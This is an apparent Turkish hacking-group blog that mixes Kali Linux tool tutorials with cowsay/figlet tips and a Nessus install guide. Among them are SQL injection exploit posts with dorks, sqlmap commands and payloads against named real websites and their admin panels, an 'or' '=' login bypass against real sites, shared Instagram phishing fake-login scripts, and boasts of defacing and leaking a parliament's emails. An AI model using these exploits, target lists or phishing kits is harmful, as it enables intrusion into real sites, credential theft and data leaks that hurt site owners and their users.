Kali Linux Cowsay & Figlet

Selamun Aleyküm ...

GNU / Linux Terminalinizi Figlet ve Cowsay ile nasıl güzelleştireceğinizden bahsettim.
ilk olarak "apt-get install figlet " komutuyla figleti kuruyoruz
ardından ; Cowsay = "apt-get install cowsay" yazarak kurun.

Yeni bir terminal açıp root dizinindeyken (pwd) leafpad .bashrc dosyasını açınız. en alt satıra inerek;

figlet Nickiniz & Yada yazmak ıstedıgınız seyi yazınız.

Örnek: 
figlet TrazeR . org
/usr/games/cowsay -f  stegosaurus " Cyber-WarrioR.org "

cowsayı nasıl ekledık derseniz ;

cd /usr/share/cowsay/cows/ komutla cowsayın bulundugu dızıne girip ls komutuyla listeledikten sonra rasgele ascii hedef seçip dosya yolunu belirttiken sonra -f komutuyla kullanmak ıstedıgım ascii.cow'u belirttim " tırnak içinde istedigim metni yazdim"
Sonuç :
Cowsay Bazi Kullanım Örnekleri
/usr/games/cowsay -b TrazeR ===> bunu bashrc dosyanıza bu şekilde eklerseniz her terminali açtıgınızda aşağıdaki örnek resim gibi açılır.

/usr/games/cowsay -d Dead  ===> -d parametresi inegin ölü görünmesini saglar. İnek Öldü başımız saolsun

/usr/games/cowsay -g açgözlü inek modu ===> -g parametresi inegi aç gözlü moda alır. bizim inek canlandi.


 /usr/games/cowsay -p paronaya inek ===> -p parametresi ineği paronaya yapar.

/usr/games/cowsay -t yorgun inek

 /usr/games/cowsay -f dragon Cyber-WarrioR AKINCILAR ===>
–f seçeneği, kullanılacak belirli bir inek resmi dosyasını (cowfile) belirtir. Bu örnekte size bir ejderha resmi gösteriyorum. 
 Genel Olarak Kullanim: /usr/games/cowsay –f <cowfile> mesajiniz


                                                                           Video:



Credits Previcinidesign Sql Injection Vulnerability


KOD:
#################################################################################
# Exploit Title: CREDITS PREVICINIDESIGN Sql İnjection Vulnerability
# Author : TrazeR & Sipahiler & TurkZ.org
# Google Dork : intext:"CREDITS PREVICINIDESIGN" & inurl:id= Or Web by PREVICINIDESIGN & php?id=
# Tested on : Kali Linux 2017 Chrome, Firefox
# Date : 2017-12-01
# Vendor Home: http://www.previcinidesign.com/
# Blog : http://www.trazer.org/
# Forum : http://www.turkz.org/Forum/
# Telegram: https://t.me/turkzgrup
#################################################################################
Tutorial :
[+] Dorking İn Google Or Other Search Enggine
[+] Open Target
[+] Sqlmap And Manuel

Command : root@TrazeR:~# sqlmap --level=5 --risk=3 --threads=10 --timeout=10  --random-agent --text-only -u "http://www.onoya.it/it/menu.php?idCat=25" --no-cast --batch --dbs

Parameter: idCat (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: idCat=25 AND 3326=3326

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: idCat=25 AND SLEEP(5)


Demo:
http://www.onoya.it/it/menu.php?idCat=25
http://www.amarcordpiadineria.it/notizie-fresche.php?ID=15
http://www.osteopatiassociati.it/casi-scheda.php?ID=29
http://ibrubinetterie.com/eng/collezione-doccia-lista.php?ID=7

Panel:
http://www.onoya.it/aps
http://www.amarcordpiadineria.it/admin/
http://www.osteopatiassociati.it/admin/
http://ibrubinetterie.com/admin/

Greet'Zzz : Darkcod3r & EfendiBey & Atabey & TrazeR & Zer0day & Kutluhan & Göçebe & BlueTrojen
Special Thanks TurkZ.org All Staff

Linux Server Bypass C1 & Ln -s


Selamun Aleyküm...

Yapılanlar gayet açık ve net, tek sıkıntı 42. saniyede excute kısmından komut verirken mkdir yazmamişim. 
"mkdir TURKZ" yazarak yenı bı dizin oluşturabilirsiniz .videoda karışmıs hatlar direk turkz yazmışız yanlış yere (: Shelin make dir kısmından TURKZ yazarakda direk dizin açabilirsiniz.

Video: 

İnstagram Phishing Fake Login Script

Selamun Aleykum..

İki Adet İnstagram Fake Login Sayfası War Elimde Sizlerle Paylasmak İstedım.
Birincisi Biraz amatör, Mail Adresıne Gönderıyor Bilgileri 

İkincisi Biraz Daha Orjınal Ama ingiliççe :)
Bunun Logları Sunucuda Bulundugu Dizıne Gelİyor logger.txt Metin Belgesine

Script Dowloand: İnstagram Phishing

Video:

Kali Linux TNscan

Selamun Aleyküm ..

TNscan Script Özellikleri:

1.Tüm web sitelerini al
2.Joomla web sitelerini al
3.WordPress web sitelerini edinin
4.Kontrol paneli bul
5.Zip dosyalarını bulun
6.Kurulum dosyalarını bulun
7.Sunucu kullanıcılarını edinin
8.SQL enjeksiyonundan tara
9.SQL enjeksiyonundan tarama ve tarama (yakında)
10.Tarama portları (liman aralığı)
11.Tarama portları (ortak portlar)
12.Sunucu afişini alın
13.Cloudflare'yi atla
14.Hakkında!
15. Çıkış

[CODE]git clone https://github.com/voletri/TNscan.git[/CODE]

Sunucudaki Tüm Sitelerde SQL Taramasi Yapabilir Wordpress Joomla Gibi Siteleride Bulabilir.
Kullanişli Script Kullanmanizi Tavsiye Ederim.

Video: 

Kali Linux TheMole Automatic SQL Injection Exploitation Tool

Selamun Aleyküm ...

Kali Linux TheMole otomatik SQL Enjeksiyon sömürme aracı

TheMole, bir komut satırı arabirimi SQL Enjeksiyon sömürme aracıdır.
Bu uygulama union-based, blind, boolean-based dayali Enjeksiyonlardan yararlanabilir.
The Mole, Mysql, Mssql ve Postgresql'i desteklemektedir;
apt-get update
apt-get install themole yazarak kurabilirsiniz.




SQL Injection Using Burp Suite And Sqlmap

Selamun Aleyküm ..

Burpsuite SQLMapper Co2

Bu uzantı, Burp'un kabiliyetlerini arttırmak için çeşitli modüller içeriyor.

Uzantının her Co2 modülü için alt sekmeli kendi yapılandırma sekmesi vardır. Diğer Burp araçlarıyla etkileşim kuran modüller Co2 yapılandırma sekmesinden devre dışı bırakılabilir, bu nedenle işlevselliğin bir bölümünü kullanırken tüm uzantıyı devre dışı bırakmaya gerek yoktur

CO2 aşağıdaki modülleri içerir:
SQLMapper, bir sqlmap yardımcı. Burp'taki herhangi bir isteği sağ tıklatın ve SQLMapper'e isteği göndermek için yeni bir menü seçeneği göreceksiniz. SQLMapper ekranı, istekle birlikte URL, POST verileri (varsa) ve Çerezler (varsa) ile önceden doldurulmuş olarak görünür. Ardından, ihtiyacınız olan diğer seçenekleri ayarlayabilir ve sonra SQLMap Komutunu komut satırında sqlmap'e kopyalayıp / yapıştırabilirsiniz.

CeWLer - HTML dosyalardan bir wordlist çıkartmak için Digininja'nın komut satırı CeWL komut dosyasına dayanan bu sürüm doğrudan Burp'un içindeki yanıtların bir listesiyle birlikte çalışır.

Masher - Öğütücü - Kelimelerin bir tohum listesi ve bir şifre belirtimi göz önüne alındığında, bu araç olası şifrelerin bulanık bir listesini oluşturacaktır. Masher, verilen listeden gelen kelimeleri birleştirerek başlayacak, ardından yeni şifreler oluşturmak için karakterleri ekleyecek ve değiştirecektir.

BasicAuther - Bir kullanıcı adı listesi ve bir şifre listesi verildiğinde, o zaman daha sonra Hırsız alanına atılabilecek uygun BasicAuth dizeleri çıktılacaktır.

Name Mangler - Bazı adları ve alanları verildiğinde, onları geçerli girişleri test etmek için Intruder'a düşebilecek potansiyel kullanıcı adlarının bir listesini oluşturmak için harekete geçirir.

Video: 


Kali Linux Burpsuite Shell Upload Bypass

Selamun Aleyküm ..

Kali Linux 2017.1 Burpsuite (Professional) Shell Upload Bypass





Fan Sesi İçin Kusura Bakmayın :)

Türk hackerlardan IKBY'ye şok! Mailleri ele geçirdiler

Türk hackerlardan IKBY'ye şok! Mailleri ele geçirdiler


Türk hackerlar gayrimeşru referandumla Türkiye'nin de güneydoğusuna göz diken IKYB'nin meclis sitesini hackledi. Sitedeki yazışmaları ele geçirdi.

Hukuksuz referandumla Irak'ı parçalamaya götüren ve sözde bağımsızlık referandumundan Türkiye'nin güneydoğusuna da göz diken Irak Bölgesel Kürt Yönetimi'ne (IKBY), Türk hackerlar siber operasyon düzenledi. 

Turkz Hacker Grubu, IKBY Parlamentosu'na ait verileri ele geçirdiğini duyurdu ve bazı mailleri yayınladı. Söz konusu mailler arasında Türkiye'ye karşı görev almak isteyen provokatörlerin de mailleri görüldü.

Türkye düşmanlarına karşı siber operasyonlara devam edeceğini belirten Turkz Hacker Grubu, terör örgütü PKK'ya hizmet eden bir hacker grubunu da hackledi. 
Türk hackerlar siber operasyonu böyle duyurdu:

KAYNAK: 

İcratler :

site: http://www.kurdistan-parliament.org/
zone: http://zone-h.org/mirror/id/30298398
zone: http://defacers.org/view->437386

Not: Cloudflareden Dolayı Yönlendirme Görünmemektedir

site: http://www.kurdishack.com/

zone: http://mirror-h.org/browse/972571/
zone: http://www.aljyyosh.org/mirror.php?id=204823
zone: http://defacers.org/view->437385
zone: http://archive.is/iHLwz
zone: http://archive.is/iHLwz/image

Detaylar: 



Kali Linux Sql İnjection Server Scanner


Selamun Aleyküm ... 

Mazda Gibi Bir Hedef Sİtemız Var Arkadaslar, Cms Joomla
Hedefde Açık Bulunamadıgı Zaman Aynı İp Adresı Üzerındekı Siteler Taranır.
Serversqlscan'da Bu Yuzden Var,Pprogramın Mantıgı Çok Basıt İp adresini Giriyosunuz Buldugu Acıkları Kayit Edecegı Dosya Adını Belırtıyosunuz Beklıyosunuz.. Tool Sizin İçin Bing Arama Motoru Üzerinde İp Adresindeki Siteleri Bulup Sonuna Meta Karakter Olan ' Tek Tırnagı Atiyor Bulursa Gösterip Kayıt Ediyor :) 

Video:


Open Source: https://paste.ubuntu.com/25485392/


Innovins Sql İnjection Vulnerability



[CODE]#################################################################################
# Exploit Title: Innovins Sql İnjection Vulnerability
# Author : Sipahiler & TURKZ.org
# Google Dork : intext:"Developed by Innovins" & inurl:id=
# Tested on : Kali Linux 2017.1 Chrome, Firefox
# Data : 2017-09-05
# Blog : http://www.trazer.org/
# Forum : http://www.turkz.org/Forum/     
#################################################################################
Tutorial :
[+] Dorking İn Google Or Other Search Enggine
[+] Open Target
[+] Sqlmap And Manuel

Command : root@TrazeR:~# sqlmap --random-agent --technique=BEUS  --threads=10 --no-cast  --tamper=space2comment,randomcase --timeout=10 --level=3 --risk=3  --batch  --dbs -u "http://www.charlstondsouza.com/event1.php?id=11"

Parameter: id (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id=11' RLIKE (SELECT (CASE WHEN (3513=3513) THEN 11 ELSE 0x28 END)) AND 'vQij'='vQij

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=11' AND (SELECT 1488 FROM(SELECT COUNT(*),CONCAT(0x716a6b6271,(SELECT (ELT(1488=1488,1))),0x7171706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'QJBd'='QJBd

    Type: UNION query
    Title: MySQL UNION query (NULL) - 6 columns
    Payload: id=-2119' UNION ALL SELECT NULL,CONCAT(0x716a6b6271,0x415064474443646e726c5968517a4f4e7561676556576553695a576473454e524d47797365504452,0x7171706a71),NULL,NULL,NULL,NULL#

Demo :
http://www.charlstondsouza.com/event1.php?id=11
http://www.pehl.co.in/page.php?id=17
http://www.sunrich.co.in/article.php?id=2

http://www.charlstondsouza.com/sn-panel/admin-login.php
http://pehl.co.in/admin/login.php
http://www.sunrich.co.in/admin

Note: Look İn The Source Code To Find The Admin Panel
References:
http://www.turkz.org/Forum/konu/innovins-sql-injection-vulnerability.3401/
https://cxsecurity.com/issue/WLB-2017090029

[/CODE]

Kali Linux Massive SQL injection Scanner

 Selamun Aleyküm ...
Sqliv Verilen dork'tan birden fazla web sitesini arar ve sonuçları birer birer tarar:

Kurulum:
git clone https://github.com/Hadesy2k/sqliv.git
cd sqliv
ls
python2 setup.py -i
python sqliv.py
Kullanim : 
Python sqliv.py - d < SQLI  DORK >  - e < ARAMA  MOTORU >   
örnek: python sqliv.py - d "inurl:index.php?id= site:IT" -e google 

Isteğe bağlı bağımsız değişkenler:
-h, --help bu yardım mesajını gösterir ve çıkar
-d inurl:SQL enjeksiyon dork
-e google arama motoru [Google şimdilik]
-p arama motorunda aramak için web sitelerinin sayısı 100
-t www.example.com tarama hedef web sitesini
-r ters etki alanı (reverse ip)

Video: 

Kali Linux Dnsmap - Subdomain Enumeration of Website in

Selamun Aleyküm ... 
 
Dnsmap

Paul Craig'in kurduğu "The Thief No One Saw" adlı kurgusal hikayeden esinlenilerek, Dnsmap ilk olarak 2006'da piyasaya sürüldü ve “Stealing the Network – How to 0wn the Box”. Başlıklı kitaptan esinlenildi.

Dnsmap
esas olarak pentester tarafından altyapı güvenliği değerlendirme/numaralandırma aşamasında bilgi toplama sırasında kullanılmak üzere tasarlanmıştır. Dnsmap Numaralandırma aşamasında, genellikle hedef şirketin IP netblocks, alt alan adlarını keşfetmek için kullanilir, hatta alt alan adlarını tespit ettigi için bu yöntem cloudflare bypass içinde kullanılır.

Genel Kullanimi : dnsmap <hedef alan adi>
Sonuç:

Dnsmap kullanim örnekleri;
Hedefi bir kelime (wordlist) listesi kullanarak taramak için ;
dnsmap example.com -w /root/Desktop/wordlisteniz.txt
yada: dnsmap example.com -w /usr/share/wordlists/dnsmap.txt

Dnsmap-bulk Kullanim Örnegi;

Birden fazla alan adlarını (domains.txt) içeren bir dosya oluşturun ve bunu dnsmap-bulk.sh 'ye gönderin
 örnek: dnsmap-bulk.sh /root/Desktop/ domains.txt



Kali Linux RED HAWK - Easy Hacking Tools


Selamun Aleyküm ...

Red Hawk Bilgi Toplama, Güvenlik Açığı Taramak İçin Kullanılan Bir Araçtır.

Red Hawk Kullanarak Yapabileceginiz Taramalar :

Temel Tarama
Site Başlığı YENİ
IP Adresi
Web Sunucusu Algılama GELİŞTİRİLMİŞ
CMS Algılama
Cloudflare Algılama
robots.txt Tarayıcı
Whoıs Arama GELİŞTİRİLMİŞ
Geo-IP Arama İp Lokasyon
Afiş Yakala  GELİŞTİRİLMİŞ
DNS Araması
Alt Alan Adı Hesap
Nmap Port Tarama
Alt Etki alanı Tarayıcı GELİŞTİRİLMİŞ
Alt Etki Alanı
IP Adresi
Ters IP Arama ve CMS Algılama GELİŞTİRİLMİŞ
Hostname
IP Adresi
CMS
SQLi Hata Tarayıcı Tabanlı
Blogcular YENİ Görünüm
HTTP Yanıt Kodu
Site Başlığı
Alexa Sıralaması
Etki Alanı Yetki
Sayfa Yetkilisi
Sosyal Bağlantı Tespiti
Grabber Linki
WordPress Tarama YENİ
Hassas Dosyaları Tarama
Sürüm Algılama
Sürüm Güvenlik Açığı Tarayıcısı
Paletli
MX Arama YENİ


Sürüm Bilgileri:
- Version 1.0.0 [11-06-2017]
- Version 1.1.0 [15-06-2017]
- Version 2.0.0 [11-08-2017]


Desteklenen CMS Listesi :
WordPress
Joomla
Drupal
Magento

Kurulum :

git clone https://github.com/Tuhinshubhra/RED_HAWK
Cd RED_HAWK
php rhawk.php
help
fix
fix komutu sıstemınızde bulunan eksık modullerı eksık olanları tespit edip indirir mutlaka kullanın fix komutunu.

VİDEO: 


Kali Linux Hash Buster - Hash Cracker

Selamun Aleyküm ...

Dowloand : https://github.com/UltimateHackers/Hash-Buster/

Blog: http://www.trazer.org/
Forum: http://www.turkz.org/Forum/



Kali Linux Bully WPS Brute Force Attack


Selamun Aleyküm ..

Bully, C'de yazılmış olan WPS kaba kuvvet saldırısının yeni bir uygulamasıdır. WPS spesifikasyonunda (şu an iyi bilinen) tasarım hatasını sömüren kavramsal olarak diğer programlarla özdeştir. Orijinal reaver kodu üzerinde birçok avantajı vardır. Bunlara daha az bağımlılık, geliştirilmiş bellek ve cpu performansı, doğru kullanımı ve daha sağlam seçenekler seti dahildir. Linux üzerinde çalışır ve mimariden bağımsız olarak gömülü Linux sistemlerinde (OpenWrt, vb.) Çalıştırmak için özel olarak geliştirilmiştir.

Bully, anormal senaryoların saptanması ve işlenmesinde çeşitli gelişmeler sağlıyor. Erişim noktalarına karşı çok sayıda satıcıdan ve farklı konfigürasyonlarla, çok başarılı sonuçlar alınarak test edilmiştir.

Wiire'in Pixiewps'inin yüklü olması gerekir. En yeni sürümü şu adreste bulabilirsiniz: https://github.com/wiire/pixiewps.

Gereksinimler :
apt-get -y install build-essential libpcap-dev libssl1.0-dev aircrack-ng pixiewps

Kurulum : git clone https://github.com/aanarchyy/bully

yada : wget https://github.com/aanarchyy/bully/archive/master.zip && unzip master.zip

cd bully*/
cd src/
make
make install


Kullanim: bully <options> interface
yada gui olarak: ./bully.py 

VİDEO: 


Kali Linux Vega Vulnerability Scanner

Selamun Aleyküm ...

Vega, Web Uygulamalarının Güvenliğini Test Etmek İçin Ücretsiz Ve Açık Kaynaklı Bir Tarayıcı, Test Platformudur. Vega, SQL Enjeksiyon, Siteler Arası Komut Dosyası (XSS), Yanlışlıkla Açıklanan Hassas Bilgiler Ve Diğer Güvenlik Açıklarını Bulmanıza Doğrulamanıza Yardımcı Olabilir. Java Tabanlı, GUI Temelli Olarak Yazılmıştır Ve Linux, OS X, Windows Üzerinde Çalışır.

Kaynak: https://subgraph.com/vega/
Hedef: Ermeni Devrimci Federasyonu Parti Websitesi
http://www.parliamentarf.am/

VİDEO: 



Hedef Site DATABASE PRİNTSCREEN

Kali Linux Airgeddon - Easy Wifi Hack


Selamun aleyküm ...

Airgeddon Wifi Hack İçin Tasarlanmış Bır Scriptir Kullanışlı Gayet Güzel Hoşuma Gitti Sizlerle Paylasmak İstedım. Anlatılacak Çok Şeyı Yok Numarasını Yazıyorsun Beklıyorsun. Web Wpa Wpa2 Wps Gıbı Desteklerı War Hatta Ewil Twin Bile Var..
 Video: 





NSWEB Admin Login Bypass

#################################################################################
# Exploit Title: NSWEB Admin Login Bypass
# Author : Sipahiler / TurkZ.org
# Date : 2017-07-26
# Google Dork : intext: NSWEB © Copyright 2017. All Rights Reserved
# Tested on : Kali Linux 2017.1 And W7
# Vendor Home : http://www.nsweb.rs/
# Blog : http://www.trazer.org/
# Forum : http://www.turkz.org/Forum/  
#################################################################################


Tutorial :

[+] Dorking in google or other search enggine
[+] Open target
[+] Enter username and password with
[+] Username: 'or' '='
[+] Password: 'or' '='

Demo :
http://www.nsweb.rs/admin
http://www.nskoncept.rs/admin/

Greet'Zzz :  Darkcod3r & EfendiBey & Atabey & TrazeR & Zer0day & AKA_1NF4z & Kutluhan & Alianz & S1R

Kali Linux Nessus Kurulumu

Selamun Aleyküm ...

Nessus Nedir ?
Nessus, Linux Camiasında Sıkça Kullanılan, Kapsamlı Bir Güvenlik Açığı Tarama Yazılımıdır. Kişisel Ve Her Tür Kurumsal Olmayan Kullanım İçin Ücretsizdir. Genel Amacı, Bilgisayar Sistemlerinde Ve Bilgisayar Ağlarında Potansiyel Güvenlik Açıklarını Tespit Etmektir.

Nessus Bir Port Tarama Yazılımından Çok Daha Üstün Özelliklere Sahiptir. Nmap Benzeri Yazılımlar Yalnızca Karşıdaki Sunucu Ya Da Makine Hakkında İşletim Sistemi, Açık Port Bilgileri Verebiliyorken Nessus, Servislerdeki Açıkları Eklentilerinin Güncelliğine Bağlı Olarak Test Edebilir. Çalışma Prensibi İstemci/Sunucu Biçimini Kullanır Ve Test Edilecek Sistemde Nessus Sunucu Yazılımının Açık Olması Daha Derinlemesine Test Ve Analiz İmkânı Sunar.
 
Geliştirici(ler):Tenable Network Security
Kararlı sürüm: 4.4 / 2011/08/01
İşletim sistemi : Windows/Linux/*BSD
Tür:Güvenlik Yazılımı
Resmî sitesi:http://www.nessus.org/

Adresinden Sistem Mimariniza Uygun Olanı Bulup Kullanım Sözleşmesini Onaylayip İndiriyoruz.


İndirdikten Sonra Terminalden İndirdiğimiz Dizine Geçiyoruz
cd Dowloands 
ls 
dpkg -i Nessus-6.10.9-debian6_amd64.deb Yazarak Kurulum İşlemine Başlıyoruz.

Bulundugumuz Dizinde
/etc/init.d/nessusd start
yazarak nessus'u başlatıyoruz
Ardından https://TrazeR:8834 Adresıni Tarayıcımızda Açıyoruz
Resim Boyutlari İçin Kusura Bakmayin Yarin Düzenleyeceğim Tekrar.

https://TrazeR:8834 Adresini Tarayicimizda Açıyoruz SSL Sorunu Ve Güvensiz Diyebilir Önemli Değil Devam Ediyoruz Nessus Setup Ekrani Geliyor Buradan Contine Diyoruz.

 Nessus Güvenlik Açığı Tarayıcısıni Kullanmak İçin Bir Yönetici Hesabı Oluşturulmalıdır. Bu Kullanıcı, Kullanıcıları Oluşturma / Silme, Taramaları Durdurma Ve Tarayıcı Yapılandırmasını Değiştirme Yeteneği İle Tarayıcıyı Tam Kontrol Yetkisine Sahiptir.


Kullanici Adimizi Şifremizi Oluşturduktan Sonra Devam Ediyoruz.
Aktivaston İçin Bu ADRESTEN Kayit Oluyoruz Ve Kayit Esnasındaki Mail Adresimize Aktivasyon Kodu Geliyor.

Ve Kurulumun Bitmesi İçin Bekliyoruz.

Kurulum İşlemi Zaman Aliyor Biraz.
Ve Kurulum Tamamlandı Başlangıçda Belirlediğimiz Kullanıcı Adı Ve Şifreyle Giriş Yapıyoruz.

Karşılama Paneli Bu Şekilde Uzun Sürdüğü İçin Sıkıldım Müsait Zamanda Genel Bi Tarama Yapar Konu Altına Eklerim ..





Kalın Sağlıcakla ..